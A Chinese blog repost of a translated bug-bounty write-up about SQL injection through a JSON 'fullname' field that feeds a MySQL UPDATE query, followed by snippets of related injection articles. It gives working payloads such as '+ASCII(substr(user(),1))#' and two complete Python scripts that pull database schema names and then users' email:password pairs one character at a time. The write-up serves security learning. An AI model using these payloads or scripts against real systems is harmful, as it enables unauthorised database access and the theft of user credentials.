mysql 注入 update_UPDATE 查询中的 SQL 注入

最新推荐文章于 2024-05-21 09:31:53 发布
最新推荐文章于 2024-05-21 09:31:53 发布
阅读量509 收藏
点赞数
文章标签: mysql 注入 update
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39712821/article/details/113163293
版权

今天,我介绍一个我最近发现的一个 SQL 注入漏洞。

在一个Hacking夜晚,依然像往常一样喝着我最爱的冰镇果汁,挑了一个 bug 比较多的程序,开始测试。

就像其他研究员一样,我四处测试 XSS payload。(通常用 '">

发生错误的地方是一个 full name 对话框,我紧接着尝试了 test'test ,同样产生了 500 错误,意味着由于单引号的问题导致该错误的发生。

意识到是这个问题后,我猜测服务器应该是构建 SQL 查询的时候没有对单引号进行转义。所以我尝试了手动转义(两个单引号)看会发生什么。我输入了 test''test ,我惊奇的发现错误不见了,而我的 full name 变为了 test'test' 。

由于该对话框是用来修改我的用户全称,故我猜测这是一个UPDATE查询语句。故我尝试了使用 '+@@VERSION+' ,刷新页面后,我的名字变为了 MySQL DBMS 的版本 5.6。

注意:由于这是一个 JSON request,故此处的 + 不会被替换为空格(%20)。

我上报了该问题不久之后,厂商回复了我,请求我进一步深入,同时从数据库中获得更多的信息。

使用这个 SQL 注入漏洞来获取更多数据似乎很难,因为当我尝试扩展查询时总是返回0,由于 MySQL 不支持使用 + 来连接两个字符串。

如果服务器是 SQL server,将会非常简单,我可以轻轻松松的使用 'x'+version()+'x' 来连接两个字符串,之后我的名字可能会变成 x5x 这样。(5是根据不同的版本不同)。

所以,别的 payload,像 'x'+user()+'x' ,将总是返回 0,由于用户名是一个 string,而 + 只能用来相加数字。

故,唯一可能的方法就是,通过转化为数字来获取string的值。因此,我使用了函数 ASCII() 来转化一个string到它对应的ASCII数字,之后我抓取返回结果,再将数字转换回 string。

`'+length(user())#`用来获取要接受的string的长度。

`'+ASCII(substr(user(),1))#`获取要接受的string的第一个字符。

`'+ASCII(substr(user(),2))#`获取要接受的string的第二个字符

`'+ASCII(substr(user(),3))#`获取要接受的string的第三个字符

以此类推。我写了一个脚本来实现这个过程:

import requests

rheaders = {} # Request headers

rcookies = {} # Request cookies

url = 'https:///api/v1/' # Vulnerable endpoint

len = 1000 # length of the string (using 1000 assuming that it won't be more than that,

going out of the string length will return 0 at that moment we know that we got the full

string)

column = 'schema_name' # what to return

table = 'information_schema.schemata' # from what

orderby = 'schema_name'

d=''

start = 0

end = 20

for l in range(start,end):

limit = l

print 'Retrieving '+column+' at row ' + str(limit+1) + '...'

if l > start and d == '':

break

d=''

for i in range(1,len):

r = requests.put(url, json={"fullname":"' ‐ (select

ASCII(substr("+column+","+str(i)+")) from "+table+" order by "+orderby+" limit

"+str(limit)+",1) #"},headers=rheaders,cookies=rcookies)

b = requests.get(url,cookies=rcookies).content.split('fullname":"',1)[1]

[:5] # Get the returned value

n = filter(lambda b:b>='0' and b<='9', b)

d += chr(int(n)) # Convert ASCII number to equivalent character

#print d

if n == '0':

print column + ' at row ' + str(limit+1)+' :‐ ', d

break

使用这个脚本,我可以通过修改’column’,’table’, ‘orderby’变量的值来轻易的获取到数据库的信息。以下是一个截图:

通过一些轻易的修改,我们可以获取到用户的邮件和密码:

运行脚本后截图:

import requests

rheaders = {}

rcookies = {}

d = ""

len = 1000

limit = 400000

print 'Retrieving email and pass at row', limit

for i in range(1,len):

r = requests.put(url, json={"fullname":"' ‐ (select

ASCII(substr(concat(email_address,0x3a,password),"+str(i)+")) from __users limit

"+str(limit)+",1) #"},headers=rheaders,cookies=rcookies)

b = requests.get(url,cookies=rcookies).content.split('fullname":"',1)[1][:5]

n = filter(lambda b:b>='0' and b<='9', b)

d += chr(int(n))

print d

if n == '0':

print "Email:Password :‐ ", d

break

本文由 看雪翻译小组 ghostway 编译,来源Mahmoud Jamal@Zombiehelp54

微信公众号 ID:ikanxue

微博:看雪安全

投稿、合作:看雪学院

weixin_39712821
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sql注入讲解ppt.pptx
08-10
SQL 注入是指 web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 web 应用程序事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库...
mysql利用参数sql_safe_updates限制update/delete范围详解
09-09
MySQL的`sql_safe_updates`参数是一个非常实用的配置选项,用于增强数据库的安全性,防止由于错误的UPDATE或DELETE语句导致的数据丢失。该参数的主要作用是限制用户在没有明确WHERE子句或者WHERE子句不能有效定位...
mysql 注入 update_关于update的一个小注入
weixin_32698563的博客
02-01 994
昨天在小密圈看到ph师傅发了一段code,当时想的是利用join方法去进行报错注入,结果晚上一看,乐师傅已经解决了QAQ(膜,自己也写一下关于这段code的分析:code区域:$link = mysqli_connect('localhost', 'root', 'root');mysqli_select_db($link, 'code');$table = addslashes($_GET['t...
SQL注入Update注入
weixin_43765321的博客
03-03 5551
1. MySQLupdate函数 如果我们需要修改或更新MysQL的数据,我们可以使用SQLUPDATE命令来操作。首先更新某一行的一个列。 UPDATE table SET column=mew_value WHERE column= value 为lastname 是"Wilson”的人添加firstname : UPDATE Person SET FirstName = 'Fred WHERE LastName = ‘Wilson’ 更新某一行的若干列 UPDATE table SET c
在进行SQL注入时遇到UPDATE语句时注意事项
最新发布
banliyaoguai的博客
05-21 329
例如,将一个字符串值与一个 DOUBLE 类型的列进行比较或运算,或者将一个非数字字符串转换为 DOUBLE 类型时。但是有一种情况,就是里面注入sql语句如果时系统函数的话,他是可以显示出系统函数的结果的,原因就是系统函数的优先级比较高,Mysql在发现系统函数的话就会执行系统函数。若使用下列代码,会出现不报错也不显示的结果。在update进行判断时他会将下面的语句用括号括起来然后再进行判断,下列语句在遇到1的时候就判断正确。在注入注入语句应该如下图,要使用1和报错函数连接。
mysql 注入 update_利用insert,update和delete注入获取数据_MySQL
weixin_29474431的博客
02-01 341
0x00 简介利用SQL注入获取数据库数据,利用的方法可以大致分为联合查询、报错、布尔盲注以及延时注入,通常这些方法都是基于select查询语句SQL注射点来实现的。那么,当我们发现了一个基于insert、update、delete语句的注射点时(比如有的网站会记录用户浏览记录,包括referer、client_ip、user-agent等,还有类似于用户注册、密码修改、信息删除等功能),还可...
mysql注入 update_MySQL三种报错注入方式下的insert,update,delete命令注入示例
weixin_39918248的博客
01-19 299
select 查询数据(大部分)在网站应用进行数据显示查询操作insert 插入数据在网站应用进行用户注册添加等操作delete 删除数据后台管理里面删除文章删除用户等操作update 更新数据数据同步缓存等操作通过以上查询方式与网站应用的关系,可以由注入点产生地方或应用猜测到对方的SQL查询方式注意:扫描工具一般不能扫描到insert,updata,delete命令的注入点,因为交互过程复杂...
【ZeyFraのWeb开发经验09】关于Field injection is not recommended的警告提示
ZeyFraの博客
09-26 215
不再推荐使用字段注入
mysql_cn_sc.rar_mysql 文_mysql手册_sql mysql
09-14
SQL部分,你可以了解到如何使用SQL语言来操作MySQL数据库,包括数据的插入(INSERT)、查询(SELECT)、更新(UPDATE)和删除(DELETE)等基本操作。此外,还有更高级的SQL特性,如联接(JOIN)、子查询、聚合函数...
MySQL数据库update更新子查询
12-14
总的来说,理解并掌握如何在`UPDATE`语句正确使用子查询MySQL数据库操作的一个重要技能。合理利用`JOIN`或并列子查询,可以有效地避免`1093`错误,实现对数据的准确更新。在设计和编写这类语句时,要确保遵循...
test_sql_sql_MYSQL_php_phpmysql_
10-04
标题的"test_sql_sql_MYSQL_php_phpmysql_"暗示了这个压缩包可能包含与SQL(结构化查询语言)和MySQL数据库管理系统相关的PHP编程示例。描述提到使用的是WAMP(Windows Apache MySQL PHP)服务器版本3.1.9_x64,这...
更新sql语句 sql注入_SQL更新语句– SQL的更新查询
从零开始的教程世界
07-14 1737
更新sql语句 sql注入SQL Update Statement or Update Query in SQL is used to modify the column data in tables. Earlier we looked into SQL Select and SQL Insert queries. 在SQL UPDATE语句或更新查询SQL来修改表列数据。 之前我们研究了SQL...
SQL注入实战:Update注入
ting_liang的博客
01-21 804
有的程序员在写源代码的时候,只是对查询sql语句的用户输入内容进行了过滤,忽略了updateupdate表名称set列名称=新值where更新条件;1、sqli-labs less-17关。类型sql语句的用户输入的内容的过滤。二、mysqlUpdate语句复习。如下图所示,爆出数据库名称。一:Update注入原理。如下图所示,爆出版本信息。
mysql update insert_【技术分享】一种新的MySQLUpdate、Insert注入方法
weixin_39765209的博客
01-18 210
预估稿费:100RMB投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿前言目前我们一般通过报错和时间盲注来对update和insert语句进行SQL注入,下面我们来讲解一种新的获取数据的方法。首先我们来看一个简单的例子,假设应用会将username字段的结果会返回给我们:$query="UPDATEusersSETusername='$username'WHER...
MySQL注入笔记
T-bag的博客
04-18 786
MySQL注入笔记 MySQL基础知识information_schema //MySQL自带数据表 table_schema //数据库名 table_name //表名 column_name //列名 select table_name information_schema.tables where table_schema=database(); //跑表名 select column_n
【安全牛学习笔记】mysql注入总结
edu_aqniu的博客
10-31 766
mysql注入总结 目录: 0x00 mysql一般注入(select) 0x01 mysql一般注入(insert、update) 0x02 mysql报错注入 0x03 mysql一般盲注 0x04 mysql时间盲注 0x05 mysql其他注入技巧 0x06 mysql数据库版本特性 0x07 声明 正文: 0x00 mys
mysql insert 注入_Insert和UpdateSQL注入的实践之旅
weixin_35696092的博客
01-19 235
1.有回显注入int型注入点和字符型都采用按位或|和按位异或^获取数据。如果拼接的值为0,可以采用按位或|运算显示查询到的数据,如果拼接的值不是0(以100为例),可以采用按位异或^运算显示运算后的数据,然后再异或一次可以恢复查询的数据。注意查询到的数据经过hex转换,如果值大于Mysql bigint 最大值9223372036854775807时,获取到的数据均为922337203685477...
MySql注入的基本了解
xf555er的博客
08-26 328
描述mysql的基本注入攻击, 给大家带来各种详细的攻击手段以及mysql语句的原理
mybatis sql update_time= new now()
05-24
在 MyBatis ,可以使用动态 SQL 的方式来构建 UPDATE 语句的 SET 子句。如果要更新一个时间戳字段,可以使用数据库的 NOW() 函数来获取当前时间戳,然后将它赋值给对应的字段。具体做法如下: 1. 在 Mapper XML...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值